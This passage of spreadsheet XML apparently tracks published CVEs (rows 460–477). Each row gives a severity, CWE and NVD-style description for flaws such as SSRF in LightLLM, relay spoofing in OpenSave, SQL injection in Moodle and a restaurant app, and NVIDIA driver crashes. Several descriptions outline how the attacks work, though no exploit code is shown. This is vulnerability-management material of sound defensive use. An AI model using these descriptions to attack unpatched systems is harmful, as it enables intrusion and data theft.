      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S460" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 fails to validate image_url and audio_url parameters in multimodal endpoints, allowing unauthenticated attackers to perform server-side request forgery. Attackers can supply arbitrary URLs to fetch internal resources, with vision model processing disclosing content or error responses revealing internal network topology.</t>
        </is>
      </c>
      <c r="T460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103243</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103397</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="inlineStr"/>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q461" s="5" t="inlineStr"/>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S461" s="5" t="inlineStr">
        <is>
          <t>OpenSave before 2.4.0-beta.1 fails to validate sender identity in WAN relay requests, allowing unpaired room members to impersonate paired devices by spoofing the RelayMessage From field. Attackers who know the room code can join, read paired peer identifiers from announcements, and send forged requests to access protected sync routes including save data, snapshots, and file operations.</t>
        </is>
      </c>
      <c r="T461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103397</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102578</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="inlineStr"/>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q462" s="5" t="inlineStr"/>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S462" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. An authenticated attacker with access to the question bank web service can submit unsanitized input directly into database queries, resulting in a SQL (Structured Query Language) injection vulnerability. This issue could allow an attacker to view, alter, or delete sensitive data stored in the underlying database.</t>
        </is>
      </c>
      <c r="T462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102578</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103230</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="inlineStr"/>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q463" s="5" t="inlineStr"/>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S463" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. Impacted is the function mysqli_query of the file User/ord.php of the component Order Placement. Executing a manipulation of the argument id/name can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103230</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103232</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="inlineStr"/>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q464" s="5" t="inlineStr"/>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S464" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. This affects the function mysqli_query of the file admin/table_booking.php. This manipulation of the argument Name causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103232</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103531</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="inlineStr"/>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q465" s="5" t="inlineStr"/>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S465" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in OpenSC up to 0.27.1. The impacted element is the function setcos_construct_fci_44 of the file src/libopensc/card-setcos.c. Executing a manipulation of the argument type_attr can lead to stack-based buffer overflow. The attack can be launched remotely. This patch is called ad730304052937c32b4eb489a06835ac6123632c. It is best practice to apply a patch to resolve this issue.</t>
        </is>
      </c>
      <c r="T465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103531</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103641</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="inlineStr"/>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q466" s="5" t="inlineStr"/>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S466" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GEGL. The Radiance HDR loader reads past the end of a memory-mapped image when an uncompressed scanline is shorter than the width declared in the file header. Opening a crafted HDR file crashes the application that uses the loader.</t>
        </is>
      </c>
      <c r="T466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103641</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47492</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="inlineStr"/>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q467" s="5" t="inlineStr"/>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S467" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where an attacker can cause improper access control. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47492</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47506</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="inlineStr"/>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q468" s="5" t="inlineStr"/>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S468" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel-mode color transform path where excessive kernel stack use occurs when evaluating YCbCr420 display emulation. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47506</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47517</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="inlineStr"/>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr"/>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q469" s="5" t="inlineStr"/>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S469" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode driver where a local user may cause a null pointer dereference by submitting a crafted ioctl. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47517</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47534</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="inlineStr"/>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q470" s="5" t="inlineStr"/>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="S470" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause a divide by zero. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47534</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47549</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="inlineStr"/>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q471" s="5" t="inlineStr"/>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S471" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel module where an unprivileged local user could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47549</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47555</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="inlineStr"/>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S472" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where a user could cause uninitialized kernel memory to be copied back to userspace. A successful exploit of this vulnerability might lead to information disclosure.</t>
        </is>
      </c>
      <c r="T472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47555</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47557</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="inlineStr"/>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S473" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47557</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47566</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="inlineStr"/>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S474" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause a memory leak in error paths leading to kernel memory exhaustion. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47566</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47567</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q475" s="5" t="inlineStr"/>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S475" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where a user could cause uncontrolled resource consumption by exhausting the DRM VMA offset address space. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47567</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47568</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="inlineStr"/>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr"/>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S476" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause uncontrolled kernel log generation by repeatedly invoking an interface that emits unrate-limited error messages. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47568</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47581</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>5.5</v>
      </c>
